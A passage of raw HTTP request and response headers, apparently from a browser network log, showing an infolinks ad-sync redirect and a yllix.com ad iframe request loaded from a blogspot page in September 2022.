Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         213.19.147.44
HTTP/2 302 Found
content-type: text/html
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
cache-control: no-store, no-cache, must-revalidate
expires: 0
pragma: no-cache
location: https://router.infolinks.com/dyn/ur-usync?uid=OPTOUT
etag: OPTOUT
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /warn.php?section=General&pub=442632&format=468x60&ga=g HTTP/1.1 
Host: yllix.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         185.66.200.224
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 29 Sep 2022 03:49:07 GMT
x-frame-options: SAMEORIGIN
X-Firefox-Spdy: h2


--- Additional Info ---